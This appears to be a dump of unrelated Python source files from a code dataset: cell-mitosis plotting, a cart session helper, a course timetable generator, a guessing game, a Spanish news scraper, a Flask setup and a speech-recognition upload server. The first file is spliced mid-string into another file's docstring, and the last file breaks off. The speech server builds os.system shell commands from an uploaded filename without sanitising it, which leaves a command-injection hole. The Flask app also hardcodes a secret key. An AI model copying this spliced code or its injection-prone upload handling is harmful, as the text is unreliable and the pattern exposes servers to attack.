getTabData(self):\n return self._tabData\n\n def dataCleanUp(self):\n cleanTabData = self._tabData\n cleanTabData =\\\n cleanTabData[cleanTabData['Feature'] != 'NO_SPOT']\n cleanTabData =\\\n cleanTabData[cleanTabData['NbOfSpotDetected'] <= 2]\n self._tabData = cleanTabData\n\n def setDataAsMitosisCells(self):\n self._tabData = self._tabData[self._tabData['Feature'] == 'SPINDLE']\n\n def mitosisPercent(self):\n dataFrame = self._tabData\n mitosis_cells = dataFrame[dataFrame['Feature'] == 'SPINDLE']\n return len(mitosis_cells)/len(dataFrame)\n\n def getAttributList(self):\n return self._tabData.columns\n\n def getAttribut(self, attributName):\n return self._tabData[attributName]\n\n def printAttributBasicStat(self, attributName):\n attribut = list(self._tabData[attributName])\n self.printStatOf(attribut)\n\n def plot2Attributs(self, axisXName, axisYName, xlim, ylim, save=False):\n axisX = self._tabData[axisXName]\n axisY = self._tabData[axisYName]\n fig, ax = plt.subplots(figsize=(15, 5))\n ax.scatter(axisX, axisY)\n plt.xlabel(axisXName)\n plt.ylabel(axisYName)\n plt.xlim(0, xlim)\n plt.ylim(0, ylim)\n if axisYName == \"CellCenterToSpCenterLen\":\n sd = np.std(axisY)\n m = np.mean(axisY)\n# threshold95 = m + 2*sd\n# permore95 = len(axisY[axisY>threshold95])/len(axisY)\n# ax.axhline(threshold95,color='red')\n ax.axhline(m, color='red')\n ax.text(30, 15, \"n=\"+str(len(axisX)),\n bbox={'alpha': 0.5, 'pad': 15}, fontsize=13)\n title = 'mean = %.4f\\nstd = %.4f' % (m, sd)\n# title = 'thresold that higher than 95%% = %.4f\\nstd = %.4f' % (m,sd)\n ax.text(20, 10, title,\n bbox={'facecolor': 'red', 'alpha': 0.5, 'pad': 15},\n fontsize=13)\n elif axisYName == \"SpAngToMaj\":\n ax.text(25, 80, \"n=\"+str(len(axisX)),\n bbox={'alpha': 0.5, 'pad': 15}, fontsize=13)\n ax.axhline(40, color='red')\n dataframe = self._tabData\n errorOriented =\\\n dataframe[dataframe['SpAngToMaj'] > 40].shape[0]/len(dataframe)\n title = '%% cells > 40 degree= %.4f' % errorOriented\n ax.text(15, 60, title,\n bbox={'facecolor': 'red', 'alpha': 0.5, 'pad': 15}, fontsize=13)\n if save:\n savefig(self._savePath+axisXName+\"_\"+axisYName)\n\n def plotHistogram(self, attribut, maxCount, save=False, suffix='',\n width=10):\n attr = self._tabData[attribut]\n self.plotHistogramWithVector(attr, attribut, maxCount, suffix, save,\n width)\n\n def plotHistogramWithVector(self, attr, attributName, maxCount, suffix='',\n save=False, width=10):\n fig, ax = plt.subplots(figsize=(15, 5))\n# ax.hist(list(attr), bins=np.arange(0, max(attr), max(attr)/len(attr) * width))\n ax.hist(list(attr), bins=np.arange(0, max(attr), width), normed=True,\n histtype='step')\n ax.set_yscale('log')\n if attributName == \"SpLength\":\n ax.text(30, 0.6, \"n=\"+str(len(attr)),\n bbox={'alpha': 0.5, 'pad': 15}, fontsize=13)\n plt.xlim(0, 35)\n plt.ylim(0, maxCount)\n elif attributName == \"SpAngToMaj\":\n ax.text(70, 0.5, \"n=\"+str(len(attr)),\n bbox={'alpha': 0.5, 'pad': 15}, fontsize=13)\n plt.xlim(0, 90)\n plt.ylim(0, maxCount)\n else:\n ax.text(0.8, 12, \"n=\"+str(len(attr)),\n bbox={'alpha': 0.5, 'pad': 15}, fontsize=13)\n plt.xlim(0, 1)\n plt.ylim(0, maxCount)\n# plt.xlabel(attributName)\n# plt.ylabel(\"count\")\n if save:\n savefig(self._savePath+\"hist_\"+attributName+suffix)\n\n def minAxisMajorAxisRatio(self):\n return self._tabData['CellMinLength']/self._tabData['CellMajLength']\n\n def showCell(self, index):\n cell = self._tabData.loc[index]\n fig, ax = plt.subplots(figsize=(14, 10))\n if \"-\" not in str(cell.Cell):\n cellPrefix = str(cell.Cell)\n else:\n cellPrefix = str(cell.Cell)[1:4]\n pathToImg = os.path.join(self._path,\n cell['AcquisitionCode'],\n \"X\"+str(int(cell.fieldX)) +\n \"_Y\"+str(int(cell.fieldY))+\"_FLUO\",\n \"croppedImgs\", cellPrefix + \".tif\")\n print(\"Path to image is:\\t\"+pathToImg)\n print(cell)\n tf = TiffFile(pathToImg)\n a = tf.asarray()\n ax.imshow(a, aspect='equal', interpolation='none', cmap='gray')\n# plt.colorbar()\n if cell['Feature'] == 'SPINDLE':\n calibration = 0.0645\n spbAlpha = 0.6\n axiAlpha = 0.7\n spotSize = 120\n cell_center_x = cell['CellCenterX']/calibration\n cell_center_y = cell['CellCenterY']/calibration\n spbs = ax.scatter([cell['spb1X']/calibration,\n cell['spb2X']/calibration],\n [cell['spb1Y']/calibration,\n cell['spb2Y']/calibration], c='red',\n marker='o', alpha=spbAlpha, s=spotSize)\n spCenter = ax.scatter(cell['SpCenterX']/calibration,\n cell['SpCenterY']/calibration,\n marker='x', c='red', s=spotSize)\n cellCenter = ax.scatter(cell_center_x,\n cell_center_y,\n marker='o', color='lime', s=spotSize)\n angle = np.deg2rad(-1*cell['CellAbsoMajAng'])\n majLen = cell['CellMajLength']/calibration\n minLen = cell['CellMinLength']/calibration\n\n majP1_x = cell_center_x - majLen/2*np.cos(angle)\n majP1_y = cell_center_y - majLen/2*np.sin(angle)\n majP2_x = cell_center_x + majLen/2*np.cos(angle)\n majP2_y = cell_center_y + majLen/2*np.sin(angle)\n\n angle = np.deg2rad(-1*cell['CellAbsoMajAng']+90)\n minP1_x = cell_center_x - minLen/2*np.cos(angle)\n minP1_y = cell_center_y - minLen/2*np.sin(angle)\n minP2_x = cell_center_x + minLen/2*np.cos(angle)\n minP2_y = cell_center_y + minLen/2*np.sin(angle)\n lineWid = 3\n majAxi, = ax.plot([majP1_x, majP2_x], [majP1_y, majP2_y], color='magenta', alpha=axiAlpha,linewidth=lineWid)\n minAxi, = ax.plot([minP1_x, minP2_x], [minP1_y, minP2_y], color='orange', alpha=axiAlpha,linewidth=lineWid)\n sp, = ax.plot([cell['spb1X']/calibration,\n cell['spb2X']/calibration],\n [cell['spb1Y']/calibration,\n cell['spb2Y']/calibration], c='red', color='red', alpha=axiAlpha,linewidth=lineWid)\n ax.set_ylim(0, a.shape[0])\n ax.set_xlim(0, a.shape[1])\n legend = ax.legend((spbs, spCenter, cellCenter, majAxi, minAxi, sp),\n ('SPBs', 'Spindle Center', 'Cell Center', 'major axis', 'minor axis','spindle'),\n scatterpoints=1, fontsize='xx-large')\n frame = legend.get_frame()\n frame.set_color('white')\n\n def rotateMitosisCells(self):\n self.dataCleanUp()\n mitosis_cells = self._tabData[self._tabData['Feature'] == 'SPINDLE']\n mitosis_cells['CellCenterY'] = mitosis_cells['CellCenterY'] - 2*mitosis_cells['CellCenterY']\n mitosis_cells['SpCenterY'] = mitosis_cells['SpCenterY'] - 2*mitosis_cells['SpCenterY']\n mitosis_cells['spb1Y'] = mitosis_cells['spb1Y'] - 2*mitosis_cells['spb1Y']\n mitosis_cells['spb2Y'] = mitosis_cells['spb2Y'] - 2*mitosis_cells['spb2Y']\n m_rotated = pd.DataFrame([])\n coords = ['spb1X', 'spb1Y', 'spb2X', 'spb2Y', 'SpCenterX',\n 'SpCenterY', 'CellCenterX', 'CellCenterY']\n mitosis_cells[coords] = mitosis_cells[coords].astype('float')\n mitosis_cells['theta'] = np.deg2rad(180 - mitosis_cells['CellAbsoMajAng']).astype('float')\n for i, (cell_id, cell) in enumerate(mitosis_cells.iterrows()):\n rotMatrix = np.array([[np.cos(cell['theta']), - np.sin(cell['theta'])],\n [np.sin(cell['theta']), np.cos(cell['theta'])]])\n cell[coords] = np.dot(rotMatrix,\n cell[coords].values.reshape(len(coords) / 2, 2).T).T.flatten()\n m_rotated = m_rotated.append(cell)\n m_rotated.loc[:, ['spb1X', 'spb2X', 'SpCenterX', 'CellCenterX']] = m_rotated.loc[:, ['spb1X' , 'spb2X' , 'SpCenterX' , 'CellCenterX']].values - m_rotated.loc[:, ['CellCenterX']].values\n m_rotated.loc[:, ['spb1Y', 'spb2Y', 'SpCenterY', 'CellCenterY']] = m_rotated.loc[:, ['spb1Y' , 'spb2Y' , 'SpCenterY' , 'CellCenterY']].values - m_rotated.loc[:, ['CellCenterY']].values \n self._rotatedData = m_rotated\n\n def showVirtualCell(self, minLength=None, maxLength=None, plotSpindle=False, save=False, suffix='', xlim=15):\n m_to_plot = self._rotatedData.copy()\n# m_to_plot = m_to_plot.iloc[(2420, 2447), ]\n showAllLength = False\n if (minLength is None) or (maxLength is None):\n if (minLength is None) & (maxLength is None):\n showAllLength = True\n if minLength is None:\n minLength = 0\n if maxLength is None:\n maxLength = 99\n m_to_plot = m_to_plot[m_to_plot['SpLength'] > minLength]\n m_to_plot = m_to_plot[m_to_plot['SpLength'] <= maxLength]\n fig, ax = plt.subplots(figsize=(15, 5))\n # Plot spindle\n if plotSpindle:\n ax.plot(m_to_plot.loc[:, ['spb1X', 'spb2X']].values.T,\n m_to_plot.loc[:, ['spb1Y', 'spb2Y']].values.T,\n color='black', lw=2, alpha=0.1, linewidth=4)\n # Plot scatter, s=100\n ax.scatter(m_to_plot['spb1X'], m_to_plot['spb1Y'], color='red', alpha=0.6)\n ax.scatter(m_to_plot['spb2X'], m_to_plot['spb2Y'], color='red', alpha=0.6)\n# ax.scatter(m_to_plot['SpCenterX'], m_to_plot['SpCenterY'], color='red', alpha=0.6, marker='x', s=100)\n ax.scatter(0, 0, color='green', alpha=0.6, s=100)\n # Plot central lines\n# ax.axvline(0, color='black')\n# ax.axhline(0, color='black')\n ax.set_aspect('equal')\n\n args = dict(color='red', alpha=0.6, lw=4)\n # Plot major axis border\n# major_mean = m_to_plot['CellMajLength'].mean()\n# ax.axvline(-major_mean / 2, **args)\n# ax.axvline(major_mean / 2, **args)\n # Plot minor axis border\n# minor_mean = m_to_plot['CellMinLength'].mean()\n# ax.axhline(-minor_mean / 2, **args)\n# ax.axhline(minor_mean / 2, **args)\n# ax.set_xlabel(\"major axis ($μm$)\", fontsize=25)\n# ax.set_ylabel(\"minor axis ($μm$)\", fontsize=25)\n# if showAllLength:\n# ax.set_title(\"Distribution of spbs(red) and center of spb(green) with all spindle length\")\n# else:\n# ax.set_title(\"Distribution of spbs(red) and center of spb(green) with spindle \"+str(minLength)+\", 'quantity': , 'name': , 'cost': }, ...]\n \"\"\"\n sessionid = get_or_create_session(db)\n\n cur = db.cursor()\n cur.execute(\"SELECT data FROM sessions WHERE sessionid=(?)\", (sessionid,))\n result = []\n row = cur.fetchone()\n cart = json.loads(row['data'])\n\n for item in cart:\n item['id'] = str(item['id'])\n item['cost'] = int(item['cost'])\n item['quantity'] = int(item['quantity'])\n\n return cart\n\n","sub_path":"Old Comp249 Assignments/Part-2/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"436590916","text":"#!/usr/bin/env python3\nfrom collections import defaultdict\n\nyear = 2018\nsemester = 3\n\nDAYS = ('M', 'T', 'W', 'Th', 'F')\n\nSTYLE = '''\n\n'''\n\ndef _start_and_duration(timestr):\n '''Parse start hour and duration from a time span string\n\n Strings look like \"9:00AM - 10:15\".\n This function does some very simplistic rounding to the next half-hour.\n\n Returns (start_hour, duration) where start_hour is the hour in 24-hour\n format and duration is the number of half-hours to the end.\n\n TODO: it might help to add doctests to this.\n '''\n\n # parsing string\n start_time, end_time = timestr.split(' - ')\n\n start_hour, start_minute = start_time.split(':')\n end_hour, end_minute = end_time.split(':')\n\n start_period = start_minute[-2:]\n start_minute = start_minute[:-2]\n start_hour = int(start_hour)\n start_minute = int(start_minute)\n\n end_hour = int(end_hour)\n end_minute = int(end_minute)\n\n # convert to 24-hour\n if start_period == 'PM' and start_hour != 12:\n start_hour += 12\n if end_hour < start_hour:\n end_hour += 12\n\n # simple half-hour rounding\n if end_minute > 30:\n end_hour += 1\n else:\n end_hour += 0.5\n\n if start_minute != 0:\n start_hour += 0.5\n\n # duration in half-hours\n duration = int((end_hour - start_hour) * 2)\n return start_hour, duration\n\ndef extract_table_data(courses):\n # {instructor: {day: {start_hour: {label: room, span: duration}}}}\n instructors = defaultdict(\n lambda: defaultdict(\n lambda: defaultdict(\n lambda: {'label': '', 'span': 1})))\n # {room: {day: {start_hour: {label: instructor, span: duration}}}}\n rooms = defaultdict(\n lambda: defaultdict(\n lambda: defaultdict(\n lambda: {'label': '', 'span': 1})))\n\n for course in courses:\n course_id = course['course_id']\n course_name = course_id.split()[-1]\n for ticket in course.get('tickets', []):\n instructor = ticket['instructor']\n instructor_last = instructor.split()[-1]\n for session in ('lecture', 'lab'):\n room = ticket[session]['room']\n days = ticket[session]['day']\n time = ticket[session]['time']\n start, duration = _start_and_duration(time)\n start = int(start*2) # columns are half-hours, not hours\n room_cell = { 'label': instructor_last, 'span': duration }\n instructor_cell = { 'label': course_name, 'span': duration }\n rooms[room][days][start] = room_cell\n instructors[instructor][days][start] = instructor_cell\n for i in range(1, duration):\n rooms[room][days][start+i] = None\n instructors[instructor][days][start+i] = None\n for day in days.split():\n room_cell = {\n 'label': instructor_last,\n 'span': duration\n }\n rooms[room][day][start] = room_cell\n instructor_cell = {\n 'label': course_name,\n 'span': duration\n }\n instructors[instructor][day][start] = instructor_cell\n # insert Nones so that the HTML generator doesn't add extra s\n for i in range(1, duration):\n rooms[room][day][start+i] = None\n instructors[instructor][day][start+i] = None\n\n return rooms, instructors\n\ndef convert_to_table(table_data, days=DAYS):\n rows = []\n table = {\n 'rows': rows,\n 'day_start': {day: 48 for day in days},\n 'day_end': {day: 0 for day in days},\n }\n\n # find start time and end time of each day\n for head in table_data.keys():\n for day in days:\n if day in table_data[head]:\n day_table = table_data[head][day]\n for time in day_table.keys():\n slot = day_table[time]\n if time < table['day_start'][day]:\n table['day_start'][day] = time\n if slot and time + slot['span'] > table['day_end'][day]:\n table['day_end'][day] = time + slot['span']\n\n # fill in cells for each day\n for head in sorted(table_data.keys()):\n cells = []\n row = {'heading': head, 'cells': cells}\n rows.append(row)\n\n for day in days:\n day_table = table_data[head][day]\n for time in range(table['day_start'][day], table['day_end'][day]):\n slot = day_table[time]\n if slot:\n cells.append(slot)\n\n return table\n\n\ndef generate_html(table, days=DAYS):\n # colgroups are used to apply column-wise CSS styles\n colgroups = [\n '',\n ]\n for day in days:\n cols = '' * (table['day_end'][day] - table['day_start'][day])\n colgroups.append('{}'.format(\n day, cols))\n\n headers = [\n '',\n ]\n # header for each day\n for day in days:\n cols = table['day_end'][day] - table['day_start'][day]\n headers.append('{}'.format(cols, day))\n headers.append('')\n headers.append('')\n\n # hours in each day\n for day in days:\n cols = table['day_end'][day] - table['day_start'][day]\n cols //= 2\n for col in range(cols):\n col += table['day_start'][day] // 2\n headers.append('{}'.format(col))\n headers.append('')\n\n rows = []\n for row in table['rows']:\n labels = []\n for cell in row['cells']:\n labels.append('{}'.format(\n cell['span'],\n cell['label']))\n rows.append('{}{}'.format(\n row['heading'],\n ''.join(labels)))\n\n html = '''\n \n {colgroups}\n {headers}\n {rows}\n
\n '''.format(colgroups=''.join(colgroups),\n headers=''.join(headers),\n rows=''.join(rows))\n return html\n\nif __name__ == '__main__':\n import json\n\n cFileName = 'courses{year}-{semester}.json'\n with open(cFileName.format(year=year, semester=semester), 'r') as file:\n courses = json.load(file)\n\n rooms, instructors = extract_table_data(courses)\n days = ('M W', 'T Th', 'F')\n room_table = convert_to_table(rooms, days)\n instructor_table = convert_to_table(instructors, days)\n\n html = STYLE\n html += generate_html(room_table, days)\n html += '

'\n html += generate_html(instructor_table, days)\n htmlFileName = 'courses{year}-{semester}.html'\n with open(htmlFileName.format(year=year, semester=semester), 'w') as file:\n file.write(html)\n\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"246621193","text":"import argparse\r\nimport numpy as np\r\nimport os\r\nimport pandas as pd\r\n\r\n\r\ndef main():\r\n\r\n parser = argparse.ArgumentParser(description='Behavioral Cloning Training Program')\r\n parser.add_argument('-d', help='data directory', dest='data_dir', type=str, default='data')\r\n parser.add_argument('-t', help='test size fraction', dest='test_size', type=float, default=0.2)\r\n parser.add_argument('-k', help='drop out probability', dest='keep_prob', type=float, default=0.5)\r\n parser.add_argument('-n', help='number of epochs', dest='nb_epoch', type=int, default=10)\r\n parser.add_argument('-s', help='samples per epoch', dest='samples_per_epoch', type=int, default=20000)\r\n parser.add_argument('-b', help='batch size', dest='batch_size', type=int, default=40)\r\n parser.add_argument('-l', help='learning rate', dest='learning_rate', type=float, default=1.0e-4)\r\n args = parser.parse_args()\r\n\r\n\r\n\r\n data_df = pd.read_csv(os.path.join(args.data_dir, 'driving_log.csv'))\r\n \r\n T = data_df.shape[0]\r\n q = np.zeros(T)\r\n \r\n q[T-1] = data_df[\"speed\"][T-1]\r\n \r\n for i in reversed(range(T-1)):\r\n q[i] = data_df[\"speed\"][i:min(i+120,T-1)].mean()\r\n \r\n data_df[\"qs\"] = q\r\n \r\n data_df.to_csv(os.path.join(args.data_dir, 'driving_log.csv'))\r\n \r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"reward_model.py","file_name":"reward_model.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"383654072","text":"import random\n\n\n# welcome\ndef welcome_print():\n print(\"\"\"\n Welcome to our secret-number-guess-game!\n The secret number lies between 1 and 50.\n If you only need 1 guess to get it right, you win the jackpot of -- $ 1 Million !! -- \"\"\")\n print(\"-\" * 100)\n\n\n# first guess, to win $ 1 million\ndef first_guess(number):\n for guess in range(1):\n try:\n guess = int(raw_input(\"\"\"This is your first guess. You can win $ 1 Million. Guess wise: \"\"\"))\n except ValueError:\n print(\"You didn't enter a valid number.\")\n break\n if guess == number:\n print(\"Congratulation! You guessed the secret number correctly, and won $ 1 Million!\"\n \"\\nBut you forgot one thing...\"\n \"\\nThe House ALWAYS wins...\"\n \"\\n...'security comes in'...\")\n # break not needed, because range = 1\n elif guess < number:\n print(\"Sorry, you didn't guess correct. \"\n \"\\nSo you can't win the $ 1 Million anymore, \"\n \"\\nbut you can still keep playing.\")\n print(\"Try something bigger!\")\n other_guesses(number)\n elif guess > number:\n print(\"Sorry, you didn't guess correct. \"\n \"\\nSo you can't win the $ 1 Million anymore, \"\n \"\\nbut you can still keep playing.\")\n print(\"Try something smaller!\")\n other_guesses(number)\n\n # when first guess was wrong, the program continues here\n # because of the wide guess-range and therefore possible boredom,\n # the user gets asked after 10 guesses if he wants to keep playing or not.\n\n\ndef other_guesses(number):\n for guess in range(9):\n try:\n guess = int(raw_input(\"Guess the secret number: \"))\n except ValueError:\n print(\"You didn't enter a valid number.\")\n continue\n if guess == number:\n print(\"Congratulations! You guessed the secret number correctly.\")\n break\n elif guess < number:\n print(\"Try something bigger!\")\n continue\n elif guess > number:\n print(\"Try something smaller!\")\n continue\n guess_again()\n\n\ndef guess_again():\n print(\"\")\n print(\"You have used all your 10 guesses.\")\n another_guess = raw_input(\"\"\"\n Do you want to play again?\n Please type yes or no.\n \"\"\")\n if another_guess.lower() == \"yes\" or another_guess.lower() == \"y\":\n secret_new = random.randint(1, 50)\n main(secret_new)\n else:\n print (\"\"\"\n Thanks for playing.\n Goodbye.\n \"\"\")\n\n\ndef main(number):\n first_guess(number)\n\n# code below gets only executed, if this exact file is being run directly\n# if someone imports the main function, the code below is not going to be executed\n\n\nsecret_number = random.randint(1, 50)\nif __name__ == \"__main__\":\n main(secret_number)\n","sub_path":"Python/Guess the secret number/guess_secret_number.py","file_name":"guess_secret_number.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"567424512","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nimport re\nfrom newspaper import Article\n\nimport goslate\n\ncategories = ['news','opinion','business','money','sport',\n 'lifestyle','arts','politics','culture']\n\nurlb = 'http://politica.elpais.com'\n\ncategoryDetail = [{'name':'sport',\n 'url':'http://deportes.elpais.com',\n 'keyword': '/deportes/'},\n {'name':'business',\n 'url':'http://economia.elpais.com/',\n 'keyword': '/economia/'},\n {'name':'politics',\n 'url':'http://politica.elpais.com',\n 'keyword': '/politica/'},\n {'name':'lifestyle',\n 'url':'http://cultura.elpais.com/',\n 'keyword': '/cultura/'},\n ]\n\ndef getSpainNews(category):\n\n if category in categories:\n url = ''\n if category == 'sport':\n url = categoryDetail[0]['url']\n cate = categoryDetail[0]['keyword']\n\n if category =='business':\n url = categoryDetail[1]['url']\n cate = categoryDetail[1]['keyword']\n\n if category =='politics':\n url = categoryDetail[2]['url']\n cate = categoryDetail[2]['keyword']\n\n if category =='lifestyle':\n url = categoryDetail[3]['url']\n cate = categoryDetail[3]['keyword']\n\n\n\n content = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(content, from_encoding='utf8')\n\n article_list = []\n\n hotNews = soup.find_all('img')\n\n\n\n for i in hotNews:\n parent = i.parent\n a = parent.attrs\n # print(a)\n if 'href' in a:\n\n m = re.match(r\"^%s\" % cate,a['href'])\n if m is not None:\n\n url = a['href']\n articleUrl = urlb.__add__(url)\n article_list.append(articleUrl)\n\n # print(article_list)\n return article_list\n\n\n\ndef getSpainArticlese(url_list):\n\n spainArticles = []\n\n title = ''\n summary = ''\n articleUrl = ''\n imageUrl = ''\n keywords = []\n\n for i in url_list:\n url = i\n\n\n # url = 'http://deportes.elpais.com/deportes/2015/07/21/actualidad/1437504468_097396.html'\n a = Article(url,language = 'es')\n\n a.download()\n a.parse()\n\n title = translateToEn(a.title)\n imageUrl = a.top_image\n summary = translateToEn(a.text[:1500])\n\n np_extractor = NPExtractor(title)\n keywords = np_extractor.extract()\n\n current_article_dict = {\n \"title\": title,\n \"description\": summary,\n \"articleUrl\": url,\n \"imageUrl\": imageUrl,\n \"keywords\": keywords\n }\n spainArticles.append(current_article_dict)\n\n\n\n return spainArticles\n\n\ndef translateToEn(text):\n\n gs = goslate.Goslate()\n result = gs.translate(text,'en')\n return result\n\n\nimport nltk\nfrom nltk.corpus import brown\n\n# This is a fast and simple noun phrase extractor (based on NLTK)\n# Feel free to use it, just keep a link back to this post\n# http://thetokenizer.com/2013/05/09/efficient-way-to-extract-the-main-topics-of-a-sentence/\n# http://www.sharejs.com/codes/\n# Create by Shlomi Babluki\n# May, 2013\n\n\n# This is our fast Part of Speech tagger\n#############################################################################\nbrown_train = brown.tagged_sents(categories='news')\nregexp_tagger = nltk.RegexpTagger(\n [(r'^-?[0-9]+(.[0-9]+)?$', 'CD'),\n (r'(-|:|;)$', ':'),\n (r'\\'*$', 'MD'),\n (r'(The|the|A|a|An|an)$', 'AT'),\n (r'.*able$', 'JJ'),\n (r'^[A-Z].*$', 'NNP'),\n (r'.*ness$', 'NN'),\n (r'.*ly$', 'RB'),\n (r'.*s$', 'NNS'),\n (r'.*ing$', 'VBG'),\n (r'.*ed$', 'VBD'),\n (r'.*', 'NN')\n])\nunigram_tagger = nltk.UnigramTagger(brown_train, backoff=regexp_tagger)\nbigram_tagger = nltk.BigramTagger(brown_train, backoff=unigram_tagger)\n#############################################################################\n\n\n# This is our semi-CFG; Extend it according to your own needs\n#############################################################################\ncfg = {}\ncfg[\"NNP+NNP\"] = \"NNP\"\ncfg[\"NN+NN\"] = \"NNI\"\ncfg[\"NNI+NN\"] = \"NNI\"\ncfg[\"JJ+JJ\"] = \"JJ\"\ncfg[\"JJ+NN\"] = \"NNI\"\n#############################################################################\n\n\nclass NPExtractor(object):\n\n def __init__(self, sentence):\n self.sentence = sentence\n\n # Split the sentence into singlw words/tokens\n def tokenize_sentence(self, sentence):\n tokens = nltk.word_tokenize(sentence)\n return tokens\n\n # Normalize brown corpus' tags (\"NN\", \"NN-PL\", \"NNS\" > \"NN\")\n def normalize_tags(self, tagged):\n n_tagged = []\n for t in tagged:\n if t[1] == \"NP-TL\" or t[1] == \"NP\":\n n_tagged.append((t[0], \"NNP\"))\n continue\n if t[1].endswith(\"-TL\"):\n n_tagged.append((t[0], t[1][:-3]))\n continue\n if t[1].endswith(\"S\"):\n n_tagged.append((t[0], t[1][:-1]))\n continue\n n_tagged.append((t[0], t[1]))\n return n_tagged\n\n # Extract the main topics from the sentence\n def extract(self):\n\n tokens = self.tokenize_sentence(self.sentence)\n tags = self.normalize_tags(bigram_tagger.tag(tokens))\n\n merge = True\n while merge:\n merge = False\n for x in range(0, len(tags) - 1):\n t1 = tags[x]\n t2 = tags[x + 1]\n key = \"%s+%s\" % (t1[1], t2[1])\n value = cfg.get(key, '')\n if value:\n merge = True\n tags.pop(x)\n tags.pop(x)\n match = \"%s %s\" % (t1[0], t2[0])\n pos = value\n tags.insert(x, (match, pos))\n break\n\n matches = []\n for t in tags:\n if t[1] == \"NNP\" or t[1] == \"NNI\":\n #if t[1] == \"NNP\" or t[1] == \"NNI\" or t[1] == \"NN\":\n matches.append(t[0])\n return matches\n\n\n# print (getSpainArticlese(getSpainNews('business')))","sub_path":"Source code/mysite/news/SpainNews.py","file_name":"SpainNews.py","file_ext":"py","file_size_in_byte":6261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"577847379","text":"# imports\nfrom logging import log\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import path\nfrom flask_login import LoginManager, login_manager\n\n# initialise database\ndb = SQLAlchemy()\nDB_NAME = \"database.db\"\n\n# create app\ndef create_app():\n # initialize the app\n app = Flask(__name__)\n\n # set decryption\n app.config[\"SECRET_KEY\"] = \"development\"\n\n # connect database\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = f\"sqlite:///{DB_NAME}\"\n db.init_app(app)\n\n # import routes\n from .views import views\n from .auth import auth\n\n app.register_blueprint(views, urL_prefix = \"/\")\n app.register_blueprint(auth, url_prefix = \"/\")\n\n # check database\n from .models import User, Note\n create_database(app)\n\n # start login manager\n login_manager = LoginManager()\n login_manager.init_app(app)\n login_manager.login_view = \"auth.login\"\n\n @login_manager.user_loader\n def load_user(id):\n return User.query.get(int(id))\n\n return app\n\n# create database\ndef create_database(app):\n if not path.exists(f\"website/{DB_NAME}\"):\n db.create_all(app = app)\n print(\"Database created\")","sub_path":"website/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"85400658","text":"import csv\n\nwith open('npi.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n measures = []\n scol = 6\n fcol = 30\n startd = []\n for row in csv_reader:\n if(line_count is 0):\n dateline = row\n line_count +=1\n for i in range(scol,fcol):\n if(row[i] is '1'):\n print(dateline[i])\n measures.append(row[2])\n startd.append(dateline[i])\n break\n #print(\"line_count\", line_count, \"text\", row[28])\n \n\nprint(measures)\nprint(startd)\nprint (len(startd), print(len(measures)))\nfor i in range(0, len(startd)):\n print(measures[i], startd[i])\n\nf = open('outfile.csv', 'w')\n\nwith f:\n\n writer = csv.writer(f)\n \n for i in range(0, len(startd)):\n writer.writerow([measures[i], startd[i]])\n\nprint(len(startd))","sub_path":"convertCSV.py","file_name":"convertCSV.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"162366915","text":"# -*- coding: utf-8 -*-\nimport BaseHTTPServer\nimport bisect\nimport cgi\nimport json\nimport os\nimport sys\nimport time\nfrom BaseHTTPServer import HTTPServer\nfrom datetime import datetime\n\nimport mxnet as mx\nimport numpy as np\n\nfrom config_util import parse_args, parse_contexts, generate_file_path\nfrom label_util import LabelUtil\nfrom log_util import LogUtil\nfrom main import load_labelutil\nfrom stt_datagenerator import DataGenerator\nfrom stt_metric import EvalSTTMetric\nfrom stt_utils import spectrogram_from_file\n\n# os.environ['MXNET_ENGINE_TYPE'] = \"NaiveEngine\"\nos.environ['MXNET_ENGINE_TYPE'] = \"ThreadedEnginePerDevice\"\nos.environ['MXNET_ENABLE_GPU_P2P'] = \"0\"\n\n\nclass WHCS:\n width = 0\n height = 0\n channel = 0\n stride = 0\n\n\nclass ConfigLogger(object):\n def __init__(self, log):\n self.__log = log\n\n def __call__(self, config):\n self.__log.info(\"Config:\")\n config.write(self)\n\n def write(self, data):\n # stripping the data makes the output nicer and avoids empty lines\n line = data.strip()\n self.__log.info(line)\n\n\nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n # Simple HTTP request handler with POST commands.\n\n def do_POST(self):\n # print self.headers['Content-Type']\n # print self.rfile\n form = cgi.FieldStorage(\n fp=self.rfile,\n headers=self.headers,\n environ={'REQUEST_METHOD': 'POST',\n 'CONTENT_TYPE': self.headers['Content-Type'],\n })\n filename = form['file'].filename\n print(\"filename is: \" + str(filename))\n output_file_pre = \"/Users/lonica/Downloads/wav/\"\n part1, part2 = filename.rsplit(\".\", 1)\n if filename.endswith(\".speex\"):\n data = form['file'].file.read()\n open(\"./\" + filename, \"wb\").write(data)\n command = \"./SpeexDecode \" + filename + \" \" + part1 + \".wav\"\n os.system(command)\n data = open(part1 + \".wav\", 'rb').read()\n open(\"./lolol.wav\", \"wb\").write(data)\n\n elif filename.endswith(\".amr\"):\n data = form['file'].file.read()\n open(output_file_pre + filename, \"wb\").write(data)\n command = \"ffmpeg -y -i \" + output_file_pre + part1 + \".amr -acodec pcm_s16le -ar 16000 -ac 1 -b 256 \" + output_file_pre + part1 + \".wav\"\n os.system(command)\n\n elif filename.lower().endswith(\".wav\"):\n data = form['file'].file\n # import 